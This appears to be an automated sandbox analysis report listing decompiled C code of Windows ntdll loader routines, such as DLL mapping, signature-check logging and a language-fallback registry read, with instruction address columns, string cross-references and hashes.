                                                                                                                                0x04ef887f
                                                                                                                                0x04ef8881
                                                                                                                                0x04ef8884
                                                                                                                                0x04ef8884
                                                                                                                                0x04ef8886
                                                                                                                                0x04ef8889
                                                                                                                                0x04ef888c
                                                                                                                                0x04ef888e
                                                                                                                                0x04ef8891
                                                                                                                                0x04ef8891
                                                                                                                                0x04ef8898
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef889a
                                                                                                                                0x04ef889b
                                                                                                                                0x04ef889e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef88a0
                                                                                                                                0x04ef88a8
                                                                                                                                0x04ef88b0
                                                                                                                                0x04ef88b2
                                                                                                                                0x04ef88d3
                                                                                                                                0x04ef88d5
                                                                                                                                0x00000000
                                                                                                                                0x04ef88d7
                                                                                                                                0x04ef88db
                                                                                                                                0x04ef88dc
                                                                                                                                0x04ef88e0
                                                                                                                                0x04ef88e8
                                                                                                                                0x04ef88ee
                                                                                                                                0x04ef88f0
                                                                                                                                0x04ef88f3
                                                                                                                                0x04ef88fc
                                                                                                                                0x04ef8901
                                                                                                                                0x04ef8906
                                                                                                                                0x04ef890c
                                                                                                                                0x04ef890c
                                                                                                                                0x04ef890f
                                                                                                                                0x04ef8916
                                                                                                                                0x04ef8917
                                                                                                                                0x04ef8918
                                                                                                                                0x04ef8919
                                                                                                                                0x04ef891a
                                                                                                                                0x04ef891f
                                                                                                                                0x04ef8921
                                                                                                                                0x04f49c52
                                                                                                                                0x04f49c55
                                                                                                                                0x04f49c5b
                                                                                                                                0x04f49cac
                                                                                                                                0x04f49cc0
                                                                                                                                0x04f49cc0
                                                                                                                                0x04f49c55
                                                                                                                                0x04ef8927
                                                                                                                                0x04ef8927
                                                                                                                                0x04ef892f
                                                                                                                                0x04ef8933
                                                                                                                                0x00000000
                                                                                                                                0x04ef88f5
                                                                                                                                0x04ef88f5
                                                                                                                                0x00000000
                                                                                                                                0x04ef88f7
                                                                                                                                0x04ef88f7
                                                                                                                                0x04ef88fa
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef88fa
                                                                                                                                0x04ef88f5
                                                                                                                                0x04ef88f3
                                                                                                                                0x00000000
                                                                                                                                0x04ef88d5
                                                                                                                                0x00000000
                                                                                                                                0x04ef88b2
                                                                                                                                0x04ef88c9
                                                                                                                                0x00000000
                                                                                                                                0x04ef88c9
                                                                                                                                0x04ef887f
                                                                                                                                0x04ef886a
                                                                                                                                0x04ef8857
                                                                                                                                0x04ef8852
                                                                                                                                0x04ef88bf
                                                                                                                                0x04ef88bf
                                                                                                                                0x04ef87aa
                                                                                                                                0x04ef87ad
                                                                                                                                0x04ef87ae
                                                                                                                                0x04ef87b4
                                                                                                                                0x04ef87b5
                                                                                                                                0x04ef87b6
                                                                                                                                0x04ef87b8
                                                                                                                                0x04ef87bd
                                                                                                                                0x04ef87c1
                                                                                                                                0x04ef87f4
                                                                                                                                0x04ef87fa
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef87c1
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                • LdrpDoPostSnapWork, xrefs: 04F49C1E
                                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04F49C18
                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 04F49C28
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 0-1948996284
                                                                                                                                • Opcode ID: 1c8457af6db6f812c50a5020d7f3e9b42b4271729dff881ae0307deaa341e1a1
                                                                                                                                • Instruction ID: eddeb926afd4747f4bba964d9630962920a88d2c8a66c3fab93a06baed6e9be7
                                                                                                                                • Opcode Fuzzy Hash: 1c8457af6db6f812c50a5020d7f3e9b42b4271729dff881ae0307deaa341e1a1
                                                                                                                                • Instruction Fuzzy Hash: B791F671B00616EFDB18EF59CC80ABA77B5FF84358B945169DA05AB250EB70FD02CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 98%
                                                                                                                                			E04EF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04EFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04EEC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4fd5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04F65510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4fd5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04F07D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04F07D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04F67016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04F07D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04F07D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04F67016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04F1A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04EEB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                                0x04ef7e4c
                                                                                                                                0x04ef7e50
                                                                                                                                0x04ef7e55
                                                                                                                                0x04ef7e58
                                                                                                                                0x04ef7e5d
                                                                                                                                0x04ef7e71
                                                                                                                                0x04ef7f33
                                                                                                                                0x04ef7e77
                                                                                                                                0x04ef7e77
                                                                                                                                0x04ef7e79
                                                                                                                                0x04ef7e79
                                                                                                                                0x04ef7e7e
                                                                                                                                0x04ef7f45
                                                                                                                                0x04f49848
                                                                                                                                0x00000000
                                                                                                                                0x04f49848
                                                                                                                                0x04ef7f4e
                                                                                                                                0x04ef7f53
                                                                                                                                0x04ef7f5a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4985a
                                                                                                                                0x04f49862
                                                                                                                                0x04f49866
                                                                                                                                0x00000000
                                                                                                                                0x04f4986c
                                                                                                                                0x00000000
                                                                                                                                0x04f4986c
                                                                                                                                0x04ef7e84
                                                                                                                                0x04ef7e84
                                                                                                                                0x04ef7e8d
                                                                                                                                0x04f49871
                                                                                                                                0x04ef7eb8
                                                                                                                                0x04ef7ec0
                                                                                                                                0x04ef7ec0
                                                                                                                                0x04ef7e9a
                                                                                                                                0x04f4987e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f49884
                                                                                                                                0x04f4988b
                                                                                                                                0x04f498a7
                                                                                                                                0x04f498ac
                                                                                                                                0x04f498b1
                                                                                                                                0x04f498b6
                                                                                                                                0x04f498b8
                                                                                                                                0x04f498b8
                                                                                                                                0x04f498b9
                                                                                                                                0x00000000
                                                                                                                                0x04f498b9
                                                                                                                                0x04ef7ea0
                                                                                                                                0x04ef7ea7
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef7eac
                                                                                                                                0x04ef7eb1
                                                                                                                                0x04ef7ec6
                                                                                                                                0x04ef7ed0
                                                                                                                                0x04f498cc
                                                                                                                                0x04ef7ed6
                                                                                                                                0x04ef7ed6
                                                                                                                                0x04ef7ed6
                                                                                                                                0x04ef7ede
                                                                                                                                0x04ef7ee3
                                                                                                                                0x04f498e3
                                                                                                                                0x04f498f0
                                                                                                                                0x04f49902
                                                                                                                                0x04f498f2
                                                                                                                                0x04f498fb
                                                                                                                                0x04f498fb
                                                                                                                                0x04f49907
                                                                                                                                0x04f4991d
                                                                                                                                0x04f4991d
                                                                                                                                0x04f49907
                                                                                                                                0x04f498e3
                                                                                                                                0x04ef7ef0
                                                                                                                                0x04ef7f14
                                                                                                                                0x04ef7f14
                                                                                                                                0x04ef7f1e
                                                                                                                                0x04f49946
                                                                                                                                0x04ef7f24
                                                                                                                                0x04ef7f24
                                                                                                                                0x04ef7f24
                                                                                                                                0x04ef7f2c
                                                                                                                                0x04f4996a
                                                                                                                                0x04f49975
                                                                                                                                0x04f49975
                                                                                                                                0x04f4997e
                                                                                                                                0x04f49993
                                                                                                                                0x04f49993
                                                                                                                                0x04f4997e
                                                                                                                                0x00000000
                                                                                                                                0x04ef7ef2
                                                                                                                                0x04ef7efc
                                                                                                                                0x04ef7f0a
                                                                                                                                0x04ef7f0e
                                                                                                                                0x04f49933
                                                                                                                                0x00000000
                                                                                                                                0x04f49933
                                                                                                                                0x00000000
                                                                                                                                0x04ef7f0e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef7eb1

                                                                                                                                Strings
                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 04F49891
                                                                                                                                • LdrpCompleteMapModule, xrefs: 04F49898
                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 04F498A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                • Opcode ID: 758d2bf2e3fc5eea0879c85518cea6b76530eed41f7ef01ecede8d453ea8ff9a
                                                                                                                                • Instruction ID: 63bc34446cd2b8b428a72593868ae11b2682eb56564e928c2df7cbcb1502712b
                                                                                                                                • Opcode Fuzzy Hash: 758d2bf2e3fc5eea0879c85518cea6b76530eed41f7ef01ecede8d453ea8ff9a
                                                                                                                                • Instruction Fuzzy Hash: 0151FF71B007449BEB25CB6CCD44F6ABBE4AB40328F54169AEA519B2D1EB74FD01CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E04EEE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04EEF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04F295D0();
						}
						if(_t78 != 0) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04F2FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04F2BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04F29600();
					if(_t97 < 0) {
						goto L6;
					}
					E04F2BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04EEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04F2BB40(_t83, _t102 + 0x24, _t78);
								if(L04EF43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04F2BB40(_t84, _t102 + 0x24, _t94);
									if(L04EF43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                                0x04eee620
                                                                                                                                0x04eee628
                                                                                                                                0x04eee62f
                                                                                                                                0x04eee631
                                                                                                                                0x04eee635
                                                                                                                                0x04eee637
                                                                                                                                0x04eee63e
                                                                                                                                0x04f45503
                                                                                                                                0x04f45503
                                                                                                                                0x04eee64c
                                                                                                                                0x04eee64c
                                                                                                                                0x04eee651
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04eee661
                                                                                                                                0x04eee665
                                                                                                                                0x04f4542a
                                                                                                                                0x04eee715
                                                                                                                                0x04eee71a
                                                                                                                                0x04eee71c
                                                                                                                                0x04eee720
                                                                                                                                0x04eee720
                                                                                                                                0x04eee727
                                                                                                                                0x04eee736
                                                                                                                                0x04eee736
                                                                                                                                0x04eee743
                                                                                                                                0x04eee743
                                                                                                                                0x04eee673
                                                                                                                                0x04eee678
                                                                                                                                0x04eee67d
                                                                                                                                0x04eee682
                                                                                                                                0x04eee685
                                                                                                                                0x04eee692
                                                                                                                                0x04eee69b
                                                                                                                                0x04eee6a3
                                                                                                                                0x04eee6ad
                                                                                                                                0x04eee6b1
                                                                                                                                0x04eee6b2
                                                                                                                                0x04eee6bb
                                                                                                                                0x04eee6bf
                                                                                                                                0x04eee6c0
                                                                                                                                0x04eee6c8
                                                                                                                                0x04eee6cc
                                                                                                                                0x04eee6d5
                                                                                                                                0x04eee6d9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04eee6e5
                                                                                                                                0x04eee6ea
                                                                                                                                0x04eee6f9
                                                                                                                                0x04eee70b
                                                                                                                                0x04eee70f
                                                                                                                                0x04f45439
                                                                                                                                0x04f4545e
                                                                                                                                0x04f4545e
                                                                                                                                0x00000000
                                                                                                                                0x04f4545e
                                                                                                                                0x04f4543b
                                                                                                                                0x04f4543e
                                                                                                                                0x04f45440
                                                                                                                                0x04f45445
                                                                                                                                0x04f45472
                                                                                                                                0x04f45475
                                                                                                                                0x04f4548d
                                                                                                                                0x04f45493
                                                                                                                                0x04f454a9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f454ab
                                                                                                                                0x04f454b4
                                                                                                                                0x04f454bc
                                                                                                                                0x04f454c8
                                                                                                                                0x04f454de
                                                                                                                                0x04f454fb
                                                                                                                                0x04f454e0
                                                                                                                                0x04f454e6
                                                                                                                                0x04f454eb
                                                                                                                                0x04f454eb
                                                                                                                                0x04f454de
                                                                                                                                0x00000000
                                                                                                                                0x04f454bc
                                                                                                                                0x04f45477
                                                                                                                                0x04f4547a
                                                                                                                                0x04f45480
                                                                                                                                0x04f45483
                                                                                                                                0x04f45486
                                                                                                                                0x04f4548b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4548b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f45447
                                                                                                                                0x04f45447
                                                                                                                                0x04f45447
                                                                                                                                0x04f45447
                                                                                                                                0x04f4544e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f45450
                                                                                                                                0x04f45452
                                                                                                                                0x04f45455
                                                                                                                                0x04f4545a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4545c
                                                                                                                                0x04f4546a
                                                                                                                                0x04f4546d
                                                                                                                                0x04f4546f
                                                                                                                                0x00000000
                                                                                                                                0x04f4546f
                                                                                                                                0x04eee70f

                                                                                                                                Strings
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04EEE68C
                                                                                                                                • @, xrefs: 04EEE6C0
                                                                                                                                • InstallLanguageFallback, xrefs: 04EEE6DB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                • API String ID: 0-1757540487
                                                                                                                                • Opcode ID: 5ea5a9bf2c7f16d787f61a521b38e8210e1dbeb1f8a07c4a18598566447f9931
                                                                                                                                • Instruction ID: 3eaaaf92295662d0a59e135b871781295ec6a2fe4bd298a20110b51a22560d00
                                                                                                                                • Opcode Fuzzy Hash: 5ea5a9bf2c7f16d787f61a521b38e8210e1dbeb1f8a07c4a18598566447f9931
                                                                                                                                • Instruction Fuzzy Hash: DA51C372504315ABD714EF24C450A7BB7E8BF88718F04192EFA85DB250FB34EA05C7A2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 77%
                                                                                                                                			E04F651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4fc05f0);
				E04F3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04EFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04F653CA(0);
						return E04F3D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04F2F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04F03690(1, _t117, 0x4ec1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04F2AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04F04620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04F2AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04F6500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04F29860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                                0x04f651be
                                                                                                                                0x04f651c3
                                                                                                                                0x04f651c8
                                                                                                                                0x04f651cd
                                                                                                                                0x04f651d0
                                                                                                                                0x04f651d3
                                                                                                                                0x04f651d8
                                                                                                                                0x04f651db
                                                                                                                                0x04f651de
                                                                                                                                0x04f651e0
                                                                                                                                0x04f651e3
                                                                                                                                0x04f651e6
                                                                                                                                0x04f651e8
                                                                                                                                0x04f65342
                                                                                                                                0x04f65351
                                                                                                                                0x04f65356
                                                                                                                                0x04f6535a
                                                                                                                                0x04f65360
                                                                                                                                0x04f65363
                                                                                                                                0x04f65366
                                                                                                                                0x04f65369
                                                                                                                                0x04f65369
                                                                                                                                0x04f6536b
                                                                                                                                0x04f6536b
                                                                                                                                0x04f65370
                                                                                                                                0x04f653a3
                                                                                                                                0x04f653a4
                                                                                                                                0x04f653a6
                                                                                                                                0x04f653ab
                                                                                                                                0x04f653ab
                                                                                                                                0x04f653ae
                                                                                                                                0x04f653ae
                                                                                                                                0x04f653b5
                                                                                                                                0x04f653bf
                                                                                                                                0x04f653bf
                                                                                                                                0x04f65375
                                                                                                                                0x04f65396
                                                                                                                                0x04f653a0
                                                                                                                                0x04f653a0
                                                                                                                                0x00000000
                                                                                                                                0x04f65396
                                                                                                                                0x04f65377
                                                                                                                                0x04f65379
                                                                                                                                0x04f6537f
                                                                                                                                0x04f6538c
                                                                                                                                0x04f65390
                                                                                                                                0x00000000
                                                                                                                                0x04f65390
                                                                                                                                0x04f651ee
                                                                                                                                0x04f651f1
                                                                                                                                0x04f65301
                                                                                                                                0x04f65310
                                                                                                                                0x04f65315
                                                                                                                                0x04f65318
                                                                                                                                0x04f6531b
                                                                                                                                0x04f65320
                                                                                                                                0x04f6532e
                                                                                                                                0x04f65331
                                                                                                                                0x00000000
                                                                                                                                0x04f65331
                                                                                                                                0x04f65328
                                                                                                                                0x04f65329
                                                                                                                                0x00000000
                                                                                                                                0x04f65329
                                                                                                                                0x04f651fa
                                                                                                                                0x04f65235
                                                                                                                                0x04f65236
                                                                                                                                0x04f65239
                                                                                                                                0x04f6523f
                                                                                                                                0x04f65240
                                                                                                                                0x04f65241
                                                                                                                                0x04f65242
                                                                                                                                0x04f65246
                                                                                                                                0x04f65247
                                                                                                                                0x04f6524e
                                                                                                                                0x04f65251
                                                                                                                                0x04f65267
                                                                                                                                0x04f65269
                                                                                                                                0x04f6526e
